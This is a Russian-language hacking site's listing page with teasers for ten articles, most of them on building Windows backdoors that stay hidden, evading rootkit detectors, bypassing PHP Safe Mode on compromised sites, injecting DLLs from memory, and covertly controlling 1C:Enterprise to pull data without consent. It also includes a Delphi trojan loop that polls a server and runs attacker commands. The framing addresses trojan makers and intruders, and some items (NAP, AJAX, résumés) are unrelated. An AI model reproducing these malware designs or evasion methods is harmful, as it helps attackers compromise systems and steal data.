В категории материалов: 357 Показано материалов: 181-190 |
Страницы: « 1 2 ... 17 18 19 20 21 ... 35 36 » |
Сортировать по:
Дате ·
Названию ·
Рейтингу ·
Комментариям ·
Просмотрам
Год назад об AJAX
говорили как о новой перспективной технологии, но сегодня он как-то выпал из
поля зрения. Значит ли это, что AJAX не оправдал надежд и постепенно уходит в
историю? Нет и еще раз нет. AJAX – это технология back-end, реализация которой
перешла с прикладного уровня на уровень фреймворков. |
В этой статье я хочу рассмотреть некоторые приемы написания BackDoor-ов для Windows
XP. Давайте сначала сформулируем минимальные требования к нашему "боевому" бэкдору:
1) автозагрузка при каждом старте системы;
2) невидимость в списке процесов;
3) небольшой размер бинарника;
Основные функции, такие как возможность работы с файловой системой,
процессами, учетными записями пользователей и т.д., должны присутствовать в зависимости от потребностей. Рассмотрим все по
порядку. |
PatchFinder - изощренная диагностическая утилита, разработанная для
детектирования руткитов. Она использует технику EPA (Анализ пути
запуска) для нахождения руткитов.
Эта статья покажет как обойти защиту на основе ЕРА.
|
Начинающего хакера очень часто может испугать то, что на сервере
включена опция Safe Mode в PHP. К примеру, хакер взломал какой-то сайт
через include(), require(), fopen() уязвимость, а на исполнение команд
оболочки у него недостаточно прав. Каждый с этим сталкивался, но не
каждый решал эту проблему.
Способов обхода Safe Mode довольно много. Но сначала разберемся в том,
что собой представляет Safe
Mode. Safe Mode – это директива в PHP, которая запрещает исполнять
system(), passthru(), exec(),
shell_exec и другие функции, выполняющие системные программы.
Если PHP настроен, как Safe Mode + open_basedir, тогда никакие файлы
вне open_basedir не обслуживаются PHP, не стартуют программы, которые
находятся вне данной директории.
Список функций ограничиваемых Safe Mode: chgrp, include, require,
chmod, link, rmdir, chown, passthru, sumlink, exec, popen, system,
fopen, readfile, unlink, file,
rename. Довольно полезная функция для системных администраторов и
довольно вредная для хакеров, не так ли? Но, все можно обойти, я в этом
убедился уже давно,
чего и тебе желаю. Safe Mode не блокирует функции include(), require(),
fopen(), fwrite() и многие другие, не менее полезные. Тогда мы просто
реализуем все, что нам нужно с помощью остальных функций PHP не
прибегая к запуску системных команд. |
Статья предназначена для более-менее опытных троянмейкеров, умеющих
работать с TCP/IP через API и знакомых с HTTP-протоколом, в частности,
с методом POST. Кроме того, необходимо разбираться в PHP на уровне
работы с текстовыми файлами, строками и суперглобальными
ассоциированными массивами (к коим относятся $_GET, $_POST и $_SERVER).
По ходу дела я, конечно, буду давать некоторые объяснения, но для
понимания всего этого "с нуля" их будет явно не достаточно.
Не испугались? ;) Ну и правильно - чего тут страшного? Начнём. |
Код, реализующий это, выглядит так:
// сначала запрос пустой
request:='';
// цикл работы трояна
while true do
begin
// отсылаем скрипту запрос
if (SendStringViaHTTP('127.0.0.1', 'test1.ru', 80, '/index.php', request, answer)<>0) then
begin
// если отослать не удалось - ждём минуту и крутим следующую итерацию
sleep(1000*SEC);
continue;
end;
// если отослать удалось - проверим answer
if (answer='') then
begin
// команд от хакера нет - очистим
reques,
// ждём минуту и крутим следующую итерацию
request:='';
sleep(1000*SEC);
continue;
end;
// если управление дошло сюда - в answer у нас команда хакера
// выполняем команду
request:=DoCommand(answer);
end; |
Внедрению DLL так или иначе (обычно в связи с перехватом API) посвящено
достаточно большое количество статей. Но ни в одной из тех, которые я
читал, не говорится, как внедрить эту DLL в чужой процесс незаметно,
т.е. не храня на диске файл самой DLL, а оперируя им непосредственно в
памяти.
В настоящее время широчайшую распространенность получили операционные
системы семейства Windows NT/2000/XP. Они широко используются не только
как домашние системы, но и в качестве серверов. Эта линейка ОС
отличается неплохой защищенностью от вредоносных программ, а также для
нее существует большое количество дополнительных систем безопасности
(различные антивирусы, фаерволлы). Основной язык для приводимых
фрагментов кода – C++, но материал актуален и для любого другого языка
(Delphi, Ассемблер и т.д.). Единственное условие - язык должен быть
100% компилируемым, а также поддерживать работу с указателями и
ассемблерные вставки. Так что любителям VB скорее всего придется
обломиться. Для полного понимания материала статьи нужно хотя бы
немножко знать ассемблер и С++. Как известно, OC Windows NT целиком
построена на системе DLL (динамически загружаемых библиотек). Система
предоставляет приложениям сервисные API функции, с помощью которых оно
может взаимодействовать с системой. Предполагается, что читатель знаком
с программированием в Visual C++, работой загрузчика Windows (загрузка
и вызов функций DLL), а также имеет некоторые представления о
программировании на ассемблере.
Данная статья актуальна только для систем Windows NT/2000/XP. |
Ситуация, когда на одной рабочей станции не установлены последние заплатки,
на другой не работает брандмауэр, а на третьей - антивирус или антишпионское ПО,
встречается сплошь и рядом. А ведь безопасность всей Сети определяется самым
слабым звеном. Как же быть администратору с клиентскими компьютерами, не
удовлетворяющими требованиям безопасности?
Новая технология NAP
Технология защиты сетевого доступа NAP (Network Access Protection),
реализованная в Win2k8, призвана помочь администратору в поддержании
безопасности Сети на максимально высоком уровне. Принцип работы NAP заключается
в следующем. При подключении клиента к Сети проверяется наличие файрвола,
последних обновлений безопасности, обновлений антивирусных программ и т.д. Если
компьютер не удовлетворяет принятым политикам, в полном доступе ему будет
отказано до тех пор, пока выявленные проблемы не будут устранены. В зависимости
от настроек, компьютеры, не прошедшие контроль, либо блокируются полностью, либо
помещаются в карантин (например, им выдаются IP-адреса из другого диапазона).
Как вариант, можно настроить только журналирование подобных событий без принятия
каких-либо мер. В карантинной подсети могут располагаться коррекционные сервера
(Remediation Server), предоставляющие ресурсы для устранения выявленных
недостатков, к примеру, сервер обновлений WSUS (Windows Server Update
Services) или антивирусная база. После обновления соответствие политикам
проверяется повторно, – если все нормально, система получает доступ в Сеть.
Среди настроек можно указать веб-страничку, на которой описано, почему
пользователь не может подключиться, и что ему для этого нужно сделать. |
Огромное количество организаций использует систему 1С:Предприятие,
но не каждый пользователь подозревает о возможном проникновении в его
систему чужаков и получении данных из базы, а также частичном
управлении функциями 1С удаленно.
Сразу скажу что, данный механизм использования 1С:Предприятие позволит
усовершенствовать некоторые функции системы и ни коим образом не
является руководством к разрушению (порче) данных или к помехам
действий удаленного пользователя.
Статья позволит программистам приобрести дополнительные навыки в
использовании системы и расширить познания.
Общий принцип механизма состоит в соединении
с 1С через OLE и последующем использованием функций 1С
на основе принимаемых команд от удаленного компьютера,
т.к. в Delphi мы можем написать приложение невидимое для пользователя,
то программа на Delphi, контролирующая 1С, будет скрыта от глаз
пользователя и подвох не будет заметен, следовательно вину после
приходящего на глазах у пользователя ужаса не на кого будет переложить
кроме как на него самого.
С помощью подобного механизма открываются возможности по управлению
системы находясь за другим компьютером в сети,
также появляется доступ к выгрузке данных из системы без согласия на то
пользователя, т.к. попадаем мы в систему вместе с пользователем, под
его учетной записью и паролем.
|
Поиск работы – редкий, но достаточно важный для соискателя процесс, от
результатов которого зависит многое в жизни человека. Рассылка резюме в
компании, которые могут стать потенциальным местом работы, и прохождение
собеседования – наиболее важные аспекты этого процесса.
Резюме
Само по себе резюме, даже самое хорошее, никому работы не дает. Но оно дает
вам шанс выделиться в потоке информации, попадающей в компанию или в кадровое
агентство. Хорошо составленное резюме увеличивает ваши шансы заинтересовать
работодателя своей кандидатурой и получить приглашение на личное собеседование.
Рассмотрим несколько ключевых факторов, которые влияют на восприятие резюме. |
|